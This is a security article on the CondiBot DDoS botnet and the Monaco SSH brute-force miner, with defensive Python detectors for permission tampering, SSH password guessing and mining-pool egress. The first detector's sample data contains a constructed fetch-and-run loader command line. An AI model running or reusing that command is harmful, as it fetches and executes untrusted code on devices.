Emerging Malware Campaigns Exploit Network Devices for DDoS Attacks and Cryptocurrency Mining
Security researchers have identified two previously undocumented malware families, CondiBot and Monaco, that compromise network devices to run large-scale distributed denial-of-service (DDoS) attacks and unauthorized cryptocurrency mining. The campaigns mark a shift in targeting: financially motivated criminals are increasingly going after the infrastructure that carries an organization's traffic rather than the endpoints behind it.
Discovery and Initial Analysis
On March 6, 2026, security analysts uncovered samples of CondiBot and Monaco, both previously undocumented. CondiBot, a DDoS botnet derived from the Mirai framework, infects Linux-based network devices, transforming them into nodes capable of overwhelming targeted systems with traffic. Monaco, written in Go 1.24.0, functions as an SSH scanner and cryptocurrency miner, infiltrating servers, routers, and IoT devices by brute-forcing weak SSH credentials to deploy Monero mining software. Notably, neither strain had been flagged on major threat intelligence platforms prior to this discovery.
Escalating Threat Landscape
The emergence of these malware strains fits a broader trend in which financially motivated actors exploit vulnerabilities in network infrastructure, a tactic once associated mainly with state-sponsored groups. The 2025 Verizon Data Breach Investigations Report highlighted an eightfold increase in exploits targeting network devices, with a median time-to-exploit of zero days (in the typical case, exploitation began the day the vulnerability was disclosed) and a median time-to-patch of 30 days. Google's Threat Intelligence Group separately reported that nearly 25% of the zero-day vulnerabilities exploited in 2025 targeted network and security systems, confirming a growing focus on this attack vector.
Challenges in Detection and Mitigation
A significant concern is the visibility gap in enterprise environments. Endpoint detection and response (EDR) tools have no view into the firmware and embedded Linux userland of network appliances, and the appliances cannot run a conventional security agent. An attacker who gains a foothold there can therefore persist undetected for long periods, using the device as a compute resource for mining or as a launch point for further attacks, including DDoS traffic aimed at third parties.
CondiBot’s Infection Mechanism and Persistence
CondiBot delivers its payload with whichever file transfer utility the target happens to have, using wget, curl, tftp or ftpget (the last two are BusyBox applets common on embedded Linux), so that the loader succeeds even on devices with a minimal toolset. Upon execution, it alters the file permissions of the system's reboot utilities so that an operator cannot simply restart the device to remove the infection. The malware then connects to a command-and-control (C2) server, registers itself with a unique identifier, and sits idle until the C2 issues an attack command, at which point it can run any of its 32 attack modules. This is an expansion over earlier Condi variants, which shipped with fewer attack modules.
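The two CondiBot behaviours described above, the multi-tool download fallback and the neutralised reboot utilities, both leave checkable traces. The following is an added example written for this page, not the malware's code and not a vendor's detection rule: one function audits reboot-related binaries for stripped execute bits (from a live system or from a mounted firmware image, since the appliance itself cannot run an agent), and another counts how many distinct download tools a captured command line chains together. The binary paths, the tool list and the sample command line are assumptions constructed for illustration.

```python
"""Indicator checks for the two CondiBot behaviours described above.

Added example, written for this page; it is not the malware's code and not
a vendor's detection rule. The binary paths, the download-tool list and the
sample command line are assumptions constructed for illustration.
"""
import os
import re
import stat

# Reboot-related binaries that a stripped execute bit would neutralise
# (assumed paths; on BusyBox-based devices several of these are symlinks to
# busybox, and os.stat follows the symlink, so the real binary is checked).
REBOOT_TOOLS = ["/sbin/reboot", "/sbin/shutdown", "/sbin/halt",
                "/sbin/poweroff", "/sbin/init", "/bin/busybox"]

EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH

# Transfer tools the article says the loader cycles through.
DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")

# Constructed command line shaped like a fallback loader, used only as input
# for the checks below.
SAMPLE_LOADER_CMD = (
    "cd /tmp; wget http://198.51.100.7/x -O x || curl -o x http://198.51.100.7/x"
    " || tftp -g -r x 198.51.100.7 || ftpget 198.51.100.7 x x; chmod +x x; ./x"
)


def non_executable(modes):
    """Return paths whose st_mode is a regular file with every execute bit
    cleared. `modes` maps path -> st_mode (int), or None for a missing file,
    so the function works on a live host or an extracted firmware image
    without doing any filesystem access of its own."""
    flagged = []
    for path, mode in modes.items():
        if mode is None:
            continue  # not present on this device; nothing to neutralise
        if stat.S_ISREG(mode) and not (mode & EXEC_BITS):
            flagged.append(path)
    return sorted(flagged)


def stat_reboot_tools(paths=REBOOT_TOOLS, root=""):
    """Collect st_mode for each watched binary under `root` (pass the mount
    point of an unpacked firmware image to check a device offline)."""
    modes = {}
    for p in paths:
        try:
            modes[p] = os.stat(root + p).st_mode
        except FileNotFoundError:
            modes[p] = None
    return modes


def downloader_chain(command):
    """Return the distinct download tools invoked in a shell command line, in
    order of first use. A loader that falls back across several tools shows
    up as a chain of two or more; an ordinary update script uses one."""
    seen = []
    for tok in re.split(r"[\s;&|()]+", command):
        name = tok.rsplit("/", 1)[-1]  # /usr/bin/wget -> wget
        if name in DOWNLOADERS and name not in seen:
            seen.append(name)
    return seen


def is_multitool_loader(command, threshold=2):
    """True when the command chains at least `threshold` different tools."""
    return len(downloader_chain(command)) >= threshold


if __name__ == "__main__":
    # Live check of this host; empty unless something has chmod'ed the tools.
    print("non-executable reboot tools:", non_executable(stat_reboot_tools()))
    print("tools chained in sample loader:", downloader_chain(SAMPLE_LOADER_CMD))
```

The permission check is the cheaper of the two to run at scale: it needs only a `stat` over a handful of paths, which most appliances expose through a support shell or a firmware backup, and a legitimate image never ships `reboot` without an execute bit. The command-line check is only as good as the command logging available (auditd, shell history, or a process-creation feed from the vendor), and a chain of two tools can occur in a careful install script, so treat it as a triage signal rather than a verdict.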
Monaco’s Tactics and Objectives
Monaco takes a different route: it brute-forces SSH credentials to gain access to servers, routers and IoT devices, then deploys Monero mining software that burns the device's CPU for the operator's profit. Writing it in Go makes this practical at scale, because Go produces statically linked binaries and cross-compiles easily, so one codebase yields executables for the x86, ARM and MIPS targets found across that device population.
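The access technique attributed to Monaco, repeated SSH password guessing, is visible in the target's own authentication log long before a miner appears. The following is an added example written for this page, not Monaco's code and not a vendor's rule: it parses OpenSSH `sshd` log lines, flags a source that exceeds a failure count inside a sliding window or that cycles through many usernames (spraying), and raises a separate alert when a password login finally succeeds from a source already flagged, which is the moment a weak credential has been found. The log lines are constructed, the thresholds are assumptions, and the syslog year (absent from the classic timestamp) is assumed to be 2026.

```python
"""Detect SSH password brute force and credential spraying in OpenSSH auth
log lines, the access technique the article attributes to Monaco.

Added example written for this page; it is not Monaco's code and not a
vendor's rule. The log lines are constructed, the thresholds are
assumptions, and the syslog year (absent from the classic timestamp) is
assumed to be 2026.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse(line, year=2026):
    """Parse one sshd line into a dict, or None if it is not a login event."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted",
            "method": m["method"], "user": m["user"], "ip": m["ip"]}


def detect(lines, window_seconds=300, fail_threshold=10, spray_threshold=5):
    """Return alerts as (kind, ip, timestamp) tuples, one per kind per IP.

    brute_force: >= fail_threshold password failures from one IP inside a
                 sliding window of window_seconds
    spray:       >= spray_threshold distinct usernames tried from one IP
    success_after_brute_force: a password login succeeded from an IP that
                 was already flagged, i.e. the weak credential was found
    Public-key events are ignored: a key cannot be guessed this way.
    """
    events = [e for e in (parse(l) for l in lines) if e]
    events.sort(key=lambda e: e["ts"])
    fails = defaultdict(list)   # ip -> failure timestamps inside the window
    users = defaultdict(set)    # ip -> usernames attempted
    alerted = set()             # (kind, ip) already reported
    alerts = []

    def fire(kind, ip, ts):
        if (kind, ip) not in alerted:
            alerted.add((kind, ip))
            alerts.append((kind, ip, ts))

    for e in events:
        if e["method"] != "password":
            continue
        ip, ts = e["ip"], e["ts"]
        if e["ok"]:
            if ("brute_force", ip) in alerted:
                fire("success_after_brute_force", ip, ts)
            continue
        cutoff = ts.timestamp() - window_seconds
        fails[ip] = [t for t in fails[ip] if t.timestamp() >= cutoff] + [ts]
        users[ip].add(e["user"])
        if len(fails[ip]) >= fail_threshold:
            fire("brute_force", ip, ts)
        if len(users[ip]) >= spray_threshold:
            fire("spray", ip, ts)
    return alerts


# Constructed sample: one source fires 12 guesses in 12 seconds and then gets
# in; a legitimate admin mistypes once and then authenticates with a key.
_GUESSES = ["admin", "root", "user", "pi", "ubnt", "support",
            "admin", "root", "guest", "test", "oracle", "admin"]
SAMPLE_LOG = [
    f"Mar  6 03:14:{i:02d} gw1 sshd[{4000 + i}]: Failed password for "
    f"invalid user {u} from 203.0.113.45 port {50000 + i} ssh2"
    for i, u in enumerate(_GUESSES)
] + [
    "Mar  6 03:14:20 gw1 sshd[4020]: Accepted password for admin from 203.0.113.45 port 50020 ssh2",
    "Mar  6 03:15:02 gw1 sshd[4031]: Failed password for alice from 198.51.100.20 port 40122 ssh2",
    "Mar  6 03:15:09 gw1 sshd[4032]: Accepted publickey for alice from 198.51.100.20 port 40123 ssh2: ED25519 SHA256:constructed",
    "Mar  6 03:15:10 gw1 sshd[4032]: pam_unix(sshd:session): session opened for user alice",
]

if __name__ == "__main__":
    for kind, ip, ts in detect(SAMPLE_LOG):
        print(f"{ts:%H:%M:%S} {kind:<26} {ip}")
```

On the sample the spray alert fires first (five distinct usernames by the fifth attempt), the brute-force alert at the tenth failure, and the success alert when `admin` is accepted. The `success_after_brute_force` kind is the one worth paging on: the first two say someone is knocking, the third says they are in. Tools such as fail2ban implement the same windowed counting, and the durable fix is the one in the recommendations below, key-only SSH, after which the failure lines stop carrying `password` at all.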
Implications for Network Security
The advent of CondiBot and Monaco highlights the evolving tactics of cybercriminals, who are now leveraging network devices not only as entry points but also as tools for executing attacks and generating illicit revenue. This evolution necessitates a reevaluation of security strategies, emphasizing the need for comprehensive monitoring and protection of network infrastructure components.
Recommendations for Mitigation
To defend against such threats, organizations should consider the following measures:
1. Regular Firmware Updates: Ensure that all network devices are running the latest firmware versions to patch known vulnerabilities.
2. Strong Authentication Practices: Enforce robust password policies and, wherever the device supports it, move SSH to key-based authentication with password logins disabled; a scanner like Monaco that only guesses passwords has nothing to attack on a key-only service.
3. Network Segmentation: Divide the network into segments to limit the spread of malware and reduce the attack surface.
4. Enhanced Monitoring: Deploy monitoring solutions capable of detecting anomalies in network traffic and device behavior, including unusual outbound connections or resource utilization.
5. Access Controls: Restrict access to network devices to authorized personnel and use management interfaces that are not exposed to the internet.
6. Incident Response Planning: Develop and regularly update incident response plans to ensure swift action in the event of a compromise.
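Recommendation 4 above asks for monitoring of unusual outbound connections, which is the one signal that survives the visibility gap: a router or firewall cannot host an agent, but its flows still cross a point you control. The following is an added example written for this page, not a vendor's rule set: it scores outbound connection records against a per-role egress baseline (a router should only ever initiate DNS, NTP, syslog and HTTPS updates on its own), against a watchlist of ports used by public mining pools, and against the first client payload bytes, which for an unencrypted pool session are a Stratum or XMRig-style JSON-RPC `login`/`mining.subscribe` request. The baseline, the port list and the records are assumptions constructed for illustration.

```python
"""Egress-anomaly and mining-protocol checks over outbound connection
records from network devices, for the monitoring recommendation above.

Added example written for this page, not a vendor's rule set. The per-role
egress baseline, the pool-port watchlist and the connection records are
assumptions constructed for illustration.
"""
import json

# Assumed baseline: (destination port, protocol) pairs a device in this role
# is expected to initiate on its own (DNS, NTP, syslog, HTTPS updates).
BASELINE = {
    "router": {(53, "udp"), (123, "udp"), (514, "udp"), (443, "tcp")},
}

# Ports widely used by public mining pools; an assumed watchlist, not a
# definitive list, so it only adds a reason rather than deciding alone.
POOL_PORTS = {3333, 4444, 5555, 7777, 9999, 14444}

# JSON-RPC methods used by Stratum (mining.*) and by the XMRig-style Monero
# pool protocol (login / submit).
MINING_METHODS = {"login", "submit", "mining.subscribe",
                  "mining.authorize", "mining.submit"}


def looks_like_stratum(payload):
    """True if the first newline-delimited line of the client payload is a
    JSON-RPC request whose method is a pool login/share call, or whose params
    carry the agent/algo fields of an XMRig login."""
    first = payload.split(b"\n", 1)[0]
    try:
        msg = json.loads(first)
    except ValueError:          # not JSON (e.g. a TLS ClientHello)
        return False
    if not isinstance(msg, dict):
        return False
    if msg.get("method") in MINING_METHODS:
        return True
    params = msg.get("params")
    return isinstance(params, dict) and "agent" in params and "algo" in params


def evaluate(records, baseline=BASELINE, pool_ports=POOL_PORTS,
             long_session_s=3600):
    """Return one finding per suspicious record with every reason it tripped."""
    findings = []
    for r in records:
        key = (r["dport"], r["proto"])
        allowed = baseline.get(r["role"], set())
        reasons = []
        if key not in allowed:
            reasons.append("outside egress baseline for role")
        if r["dport"] in pool_ports:
            reasons.append("destination port on mining-pool watchlist")
        if looks_like_stratum(r.get("payload", b"")):
            reasons.append("Stratum/XMRig JSON-RPC in first client bytes")
        if key not in allowed and r.get("duration_s", 0) >= long_session_s:
            reasons.append("long-lived unbaselined session")
        if reasons:
            findings.append({"src": r["src"], "dst": f'{r["dst"]}:{r["dport"]}',
                             "reasons": reasons})
    return findings


# Constructed records: flow export fields plus the first client payload bytes.
SAMPLE_RECORDS = [
    {"src": "10.0.0.1", "role": "router", "dst": "192.0.2.10", "dport": 123,
     "proto": "udp", "duration_s": 0, "payload": b""},
    {"src": "10.0.0.1", "role": "router", "dst": "198.51.100.23", "dport": 14444,
     "proto": "tcp", "duration_s": 7200,
     "payload": b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"WALLET_PLACEHOLDER","pass":"x","agent":"XMRig/6.21.0","algo":["rx/0"]}}\n'},
    {"src": "10.0.0.1", "role": "router", "dst": "203.0.113.99", "dport": 443,
     "proto": "tcp", "duration_s": 12, "payload": b"\x16\x03\x01\x00\xf4\x01"},
    {"src": "10.0.0.2", "role": "router", "dst": "192.0.2.50", "dport": 6667,
     "proto": "tcp", "duration_s": 30, "payload": b""},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_RECORDS):
        print(f'{f["src"]} -> {f["dst"]}: ' + "; ".join(f["reasons"]))
```

The second record trips all four reasons; the fourth trips only the baseline, which is still enough to open a ticket because a router has no business initiating a TCP session to port 6667 on its own. The payload check is the weakest of the four: XMRig can wrap the pool session in TLS, and a pool on port 443 defeats the port watchlist too, so the durable signal is the per-role baseline, which needs no knowledge of the miner at all. Sustained CPU on an appliance that should be idle, read over SNMP or the vendor API, is the matching host-side indicator for the resource-utilization half of the recommendation.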
Conclusion
The discovery of CondiBot and Monaco serves as a stark reminder of the dynamic nature of cyber threats. As attackers continue to innovate, organizations must adopt proactive and adaptive security measures to protect their network infrastructure from being co-opted into malicious activities.